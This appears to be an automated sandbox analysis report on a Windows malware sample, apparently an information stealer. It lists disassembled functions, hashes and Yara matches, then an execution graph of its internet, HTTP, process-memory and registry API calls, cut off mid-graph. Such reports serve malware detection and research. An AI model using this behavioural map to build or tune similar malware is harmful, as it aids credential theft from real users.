                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02502990
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                    • String ID:
                                                    • API String ID: 3103352999-0
                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                    • Instruction ID: 958e079a58048ba038147815f301e28676439959fcdfac11ec547dab55afb832
                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                    • Instruction Fuzzy Hash: 0AE0C23040010A679714BBB89C8CA7B36A87B01725F600F26F861E20E0EB68D0084AAC
                                                    Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                    • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                    • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                    • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                    Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ACP$OCP
                                                    • API String ID: 0-711371036
                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                    Function 0252B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0252B32B,?,00000050,?,?,?,?,?), ref: 0252B1AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ACP$OCP
                                                    • API String ID: 0-711371036
                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction ID: e5dcb0415338bbab4bd7542dbd8820032d7c170eee06e78cecdb31c58a8ec2ab
                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                    • Instruction Fuzzy Hash: FD21B662A10135A6EB348F64CD01BA777AAFF86B5CF468424E909D72C4F732D948C398
                                                    Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: EncodersGdipImage$Size
                                                    • String ID: image/png
                                                    • API String ID: 864223233-2966254431
                                                    • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                    • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                    • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                    • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                    Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: F(@
                                                    • API String ID: 1452528299-2698495834
                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                    • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                    • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                    Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ___std_exception_destroy
                                                    • String ID: F(@$ios_base::failbit set
                                                    • API String ID: 4194217158-1828034088
                                                    • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                    • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                    • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                    • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                    Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_catch
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3886170330-2084237596
                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                    Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                      • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                      • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                      • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                      • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                    • String ID: F@
                                                    • API String ID: 2118720939-885931407
                                                    • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                    • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                    • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                    • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                    Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                      • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                    Strings
                                                    • Access violation - no RTTI data!, xrefs: 00428D7A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                    • String ID: Access violation - no RTTI data!
                                                    • API String ID: 2053020834-2158758863
                                                    • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                    • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                    • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                    • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                    Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                    • String ID: zB$~B
                                                    • API String ID: 3275300208-395995950
                                                    • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                    • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                    • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                    • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                    Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                    • String ID: pThreadProxy
                                                    • API String ID: 1687795959-3651400591
                                                    • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                    • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                    • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                    • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                    Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                    • GetLastError.KERNEL32 ref: 0042AF2E
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                    • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                    • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                    • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                    Function 0251B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024F2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024F2AAD,00000000), ref: 0251B187
                                                    • GetLastError.KERNEL32 ref: 0251B195
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,024F2AAD,00000000), ref: 0251B1F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                    • Instruction ID: 69d67923db2fe85f3cbaf061169db830ccda95cdadbe5d0c4f3a0f7bf2948c14
                                                    • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                    • Instruction Fuzzy Hash: 43410731604206AFEF259F65CC44BBE7FA5FF41718F254169EC69971A0DB30CA05CB68

                                                    Execution Graph

                                                    Execution Coverage:4.8%
                                                    Dynamic/Decrypted Code Coverage:7.8%
                                                    Signature Coverage:9.5%
                                                    Total number of Nodes:1372
                                                    Total number of Limit Nodes:35
                                                    execution_graph 34189 409e40 10 API calls 34190 418240 12 API calls 34191 407641 free 34141 422940 GetCurrentProcess IsWow64Process 34091 24a964e 6 API calls 2 library calls 34142 24a0b4f 1730 API calls 34193 24a2417 ReadProcessMemory ReadProcessMemory VirtualQueryEx ??_V@YAXPAX 34144 2498f43 StrCmpCA ExitProcess strtok_s strtok_s 34092 249c642 22 API calls 34145 24a7b47 5 API calls 3 library calls 34093 24a2a5a lstrcpy 34194 408e50 strlen malloc strcpy_s free std::_Xinvalid_argument 34146 421550 lstrcpy lstrcpy lstrcpy lstrcpy 34094 24a964f 173 API calls 3 library calls 34147 248bf50 84 API calls 34236 249cc4e 11 API calls 34149 248e167 528 API calls 34150 2489357 19 API calls 34151 40b960 120 API calls 34237 417f60 7 API calls 34152 249870e strtok_s 34095 248b660 92 API calls 34096 2497260 142 API calls 34153 24a2f67 11 API calls 34238 24a2d67 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 32718 405570 GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 32719 405627 InternetCloseHandle InternetCloseHandle 32718->32719 32723 4055d1 32718->32723 32724 40563f 32719->32724 32720 4055d8 InternetReadFile 32721 405623 32720->32721 32720->32723 32721->32719 32722 405600 KiUserExceptionDispatcher 32722->32722 32722->32723 32723->32720 32723->32721 32723->32722 34097 40a070 12 API calls 34098 249ae79 114 API calls 34100 417c70 11 API calls 34242 249890d 46 API calls 34154 2493f70 238 API calls 34243 2496970 492 API calls 34102 2481673 8 API calls 34244 2487557 VirtualProtect 34103 24a5e74 memmove RaiseException __CxxThrowException@8 34155 40897f RaiseException __CxxThrowException@8 34105 406000 82 API calls 33554 41f300 lstrlenA 33555 41f33e 33554->33555 33556 41f352 lstrlenA 33555->33556 33557 41f346 lstrcpy 33555->33557 33558 41f363 33556->33558 33557->33556 33559 41f377 lstrlenA 33558->33559 33560 41f36b lstrcpy 33558->33560 33561 41f388 33559->33561 33560->33559 33562 41f390 lstrcpy 33561->33562 33563 41f39c 33561->33563 33562->33563 33564 41f3b8 lstrcpy 33563->33564 33565 41f3c4 33563->33565 33564->33565 33566 41f3e6 lstrcpy 33565->33566 33567 41f3f2 33565->33567 33566->33567 33568 41f41c lstrcpy 33567->33568 33569 41f428 33567->33569 33568->33569 33570 41f44e lstrcpy 33569->33570 33613 41f460 33569->33613 33570->33613 33571 41f46c lstrlenA 33571->33613 33572 41f626 lstrcpy 33572->33613 33573 41f504 lstrcpy 33573->33613 33574 41f656 lstrcpy 33636 41f65e 33574->33636 33575 41f529 lstrcpy 33575->33613 33576 401410 8 API calls 33576->33636 33577 41f100 36 API calls 33577->33636 33578 41f5e0 lstrcpy 33578->33613 33579 41f70d lstrcpy 33579->33636 33580 41f88a StrCmpCA 33585 420061 33580->33585 33580->33613 33581 41f788 StrCmpCA 33581->33580 33581->33636 33582 41fbcb StrCmpCA 33592 41fff8 33582->33592 33582->33613 33583 41f8ba lstrlenA 33583->33613 33584 420083 lstrlenA 33600 42009f 33584->33600 33585->33584 33588 42007b lstrcpy 33585->33588 33586 41ff0b StrCmpCA 33587 41ff1f Sleep 33586->33587 33597 41ff35 33586->33597 33587->33613 33588->33584 33589 41f7be lstrcpy 33589->33636 33590 41fbfb lstrlenA 33590->33613 33591 42001a lstrlenA 33598 420036 33591->33598 33592->33591 33593 420012 lstrcpy 33592->33593 33593->33591 33594 41fa26 lstrcpy 33594->33613 33595 41f8ed lstrcpy 33595->33613 33596 41ff57 lstrlenA 33606 41ff73 33596->33606 33597->33596 33601 41ff4f lstrcpy 33597->33601 33605 41ff94 lstrlenA 33598->33605 33608 42004f lstrcpy 33598->33608 33599 4200c0 lstrlenA 33611 4200dc 33599->33611 33600->33599 33603 4200b8 lstrcpy 33600->33603 33601->33596 33602 41fd66 lstrcpy 33602->33613 33603->33599 33604 41fc2e lstrcpy 33604->33613 33622 41ffb0 33605->33622 33606->33605 33620 41ff8c lstrcpy 33606->33620 33607 41f910 lstrcpy 33607->33613 33608->33605 33610 41fa56 lstrcpy 33610->33636 33612 4200fd 33611->33612 33614 4200f5 lstrcpy 33611->33614 33615 401510 4 API calls 33612->33615 33613->33571 33613->33572 33613->33573 33613->33574 33613->33575 33613->33578 33613->33580 33613->33582 33613->33583 33613->33586 33613->33590 33613->33594 33613->33595 33613->33602 33613->33604 33613->33607 33613->33610 33617 41efe0 28 API calls 33613->33617 33618 41fc51 lstrcpy 33613->33618 33619 401410 8 API calls 33613->33619 33621 41fd96 lstrcpy 33613->33621 33626 41f964 lstrcpy 33613->33626 33629 41fca5 lstrcpy 33613->33629 33613->33636 33614->33612 33638 41ffdd 33615->33638 33616 41f812 lstrcpy 33616->33636 33617->33613 33618->33613 33619->33613 33620->33605 33621->33636 33623 41ffd1 33622->33623 33624 41ffc9 lstrcpy 33622->33624 33639 401510 33623->33639 33624->33623 33626->33613 33627 41fab5 lstrcpy 33627->33636 33628 41fb30 StrCmpCA 33628->33582 33628->33636 33629->33613 33630 41fe70 StrCmpCA 33630->33586 33630->33636 33631 41fdf5 lstrcpy 33631->33636 33632 41fb63 lstrcpy 33632->33636 33633 41fea3 lstrcpy 33633->33636 33634 41efe0 28 API calls 33634->33636 33635 41fbb7 lstrcpy 33635->33636 33636->33576 33636->33577 33636->33579 33636->33581 33636->33582 33636->33586 33636->33589 33636->33613 33636->33616 33636->33627 33636->33628 33636->33630 33636->33631 33636->33632 33636->33633 33636->33634 33636->33635 33637 41fef7 lstrcpy 33636->33637 33637->33636 33640 40151f 33639->33640 33641 40152b lstrcpy 33640->33641 33642 401533 33640->33642 33641->33642 33643 40154d lstrcpy 33642->33643 33644 401555 33642->33644 33643->33644 33645 40156f lstrcpy 33644->33645 33647 401577 33644->33647 33645->33647 33646 401599 33646->33638 33647->33646 33648 401591 lstrcpy 33647->33648 33648->33646 34156 418d00 18 API calls 34157 24a8708 162 API calls 2 library calls 34199 425a00 12 API calls 34106 24981fc lstrlen lstrcpy strtok_s 34107 2485a00 54 API calls 34200 2480001 9 API calls 34108 2489a03 49 API calls 34158 24a4707 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 34202 406a10 16 API calls 34246 407b10 170 API calls 33884 426710 33885 426b2e 8 API calls 33884->33885 33886 42671d 43 API calls 33884->33886 33887 426bc4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33885->33887 33888 426c38 33885->33888 33886->33885 33887->33888 33889 426d02 33888->33889 33890 426c45 8 API calls 33888->33890 33891 426d0b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33889->33891 33892 426d7f 33889->33892 33890->33889 33891->33892 33893 426e19 33892->33893 33894 426d8c 6 API calls 33892->33894 33895 426f40 33893->33895 33896 426e26 12 API calls 33893->33896 33894->33893 33897 426f49 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33895->33897 33898 426fbd 33895->33898 33896->33895 33897->33898 33899 426ff1 33898->33899 33900 426fc6 GetProcAddress GetProcAddress 33898->33900 33901 427025 33899->33901 33902 426ffa GetProcAddress GetProcAddress 33899->33902 33900->33899 33903 427032 10 API calls 33901->33903 33904 42711d 33901->33904 33902->33901 33903->33904 33905 427182 33904->33905 33906 427126 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33904->33906 33907 42718b GetProcAddress 33905->33907 33908 42719e 33905->33908 33906->33905 33907->33908 33909 427203 33908->33909 33910 4271a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33908->33910 33910->33909 34159 2488f10 ??2@YAPAXI RaiseException 34204 248fc10 139 API calls 34109 24a9a10 SetUnhandledExceptionFilter 34110 24a2e17 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 34160 2498329 7 API calls 34205 249870e StrCmpCA strtok_s 33863 422820 GetProcessHeap HeapAlloc 33870 4228b0 GetProcessHeap HeapAlloc RegOpenKeyExA 33863->33870 33865 422849 33866 422850 33865->33866 33867 42285a RegOpenKeyExA 33865->33867 33868 422892 RegCloseKey 33867->33868 33869 42287b RegQueryValueExA 33867->33869 33869->33868 33871 4228f5 RegQueryValueExA 33870->33871 33872 42290b RegCloseKey 33870->33872 33871->33872 33873 422920 33872->33873 33873->33865 33873->33873 34111 424020 SHGetFolderPathA lstrcpy 34112 248a620 158 API calls 34206 2481820 194 API calls 33649 41ef30 33650 41ef50 33649->33650 33651 41ef68 33650->33651 33652 41ef60 lstrcpy 33650->33652 33657 401410 33651->33657 33652->33651 33656 41ef7e 33658 401510 4 API calls 33657->33658 33659 40141b 33658->33659 33660 401435 lstrcpy 33659->33660 33661 40143d 33659->33661 33660->33661 33662 401457 lstrcpy 33661->33662 33663 40145f 33661->33663 33662->33663 33664 401479 lstrcpy 33663->33664 33666 401481 33663->33666 33664->33666 33665 4014e5 33668 4056c0 33665->33668 33666->33665 33667 4014dd lstrcpy 33666->33667 33667->33665 33669 4056e0 33668->33669 33670 4056f5 33669->33670 33671 4056ed lstrcpy 33669->33671 33672 404ae0 5 API calls 33670->33672 33671->33670 33673 405700 33672->33673 33816 424090 CryptBinaryToStringA GetProcessHeap HeapAlloc CryptBinaryToStringA 33673->33816 33675 405736 lstrlenA 33817 424090 CryptBinaryToStringA GetProcessHeap HeapAlloc CryptBinaryToStringA 33675->33817 33677 405755 33678 40577e lstrcpy 33677->33678 33679 40578a 33677->33679 33678->33679 33680 4057bd lstrcpy 33679->33680 33681 4057c9 33679->33681 33680->33681 33682 4057ed lstrcpy 33681->33682 33683 4057f9 33681->33683 33682->33683 33684 405822 lstrcpy 33683->33684 33685 40582e 33683->33685 33684->33685 33686 405868 InternetOpenA StrCmpCA 33685->33686 33687 40585c lstrcpy 33685->33687 33688 40589c 33686->33688 33687->33686 33689 405f34 InternetCloseHandle 33688->33689 33818 423e10 lstrcpy lstrcpy GetSystemTime 33688->33818 33703 405f6a 33689->33703 33691 4058b6 33692 4058de lstrcpy lstrcatA 33691->33692 33693 4058f3 33691->33693 33692->33693 33694 405912 lstrcpy 33693->33694 33695 40591a 33693->33695 33694->33695 33696 405929 lstrlenA 33695->33696 33697 405941 33696->33697 33698 40594e lstrcpy lstrcatA 33697->33698 33699 405962 33697->33699 33698->33699 33700 40598f lstrlenA 33699->33700 33702 40597c lstrcpy lstrcatA 33699->33702 33701 4059a5 33700->33701 33704 4059af lstrcpy lstrcatA 33701->33704 33705 4059c3 33701->33705 33702->33700 33703->33656 33704->33705 33706 4059e2 lstrcpy 33705->33706 33707 4059ea 33705->33707 33706->33707 33708 4059ff lstrlenA 33707->33708 33709 405a1a 33708->33709 33710 405a2b lstrcpy lstrcatA 33709->33710 33711 405a3b 33709->33711 33710->33711 33712 405a59 lstrcpy lstrcatA 33711->33712 33713 405a6c 33711->33713 33712->33713 33714 405a8a lstrcpy 33713->33714 33715 405a92 33713->33715 33714->33715 33716 405aa0 InternetConnectA 33715->33716 33717 405f2e 33716->33717 33718 405acf HttpOpenRequestA 33716->33718 33717->33689 33719 405f27 InternetCloseHandle 33718->33719 33720 405b0b 33718->33720 33719->33717 33819 427340 lstrlenA lstrcpy lstrcatA 33720->33819 33722 405b1b 33820 4272b0 lstrcpy 33722->33820 33724 405b24 33821 4272f0 lstrcpy lstrcatA 33724->33821 33726 405b37 33822 4272b0 lstrcpy 33726->33822 33728 405b40 33823 427340 lstrlenA lstrcpy lstrcatA 33728->33823 33730 405b55 33824 4272b0 lstrcpy 33730->33824 33732 405b5e 33825 427340 lstrlenA lstrcpy lstrcatA 33732->33825 33734 405b74 33826 4272b0 lstrcpy 33734->33826 33736 405b7d 33827 427340 lstrlenA lstrcpy lstrcatA 33736->33827 33738 405b93 33828 4272b0 lstrcpy 33738->33828 33740 405b9c 33829 427340 lstrlenA lstrcpy lstrcatA 33740->33829 33742 405bb1 33830 4272b0 lstrcpy 33742->33830 33744 405bba 33831 4272f0 lstrcpy lstrcatA 33744->33831 33746 405bcd 33832 4272b0 lstrcpy 33746->33832 33748 405bd6 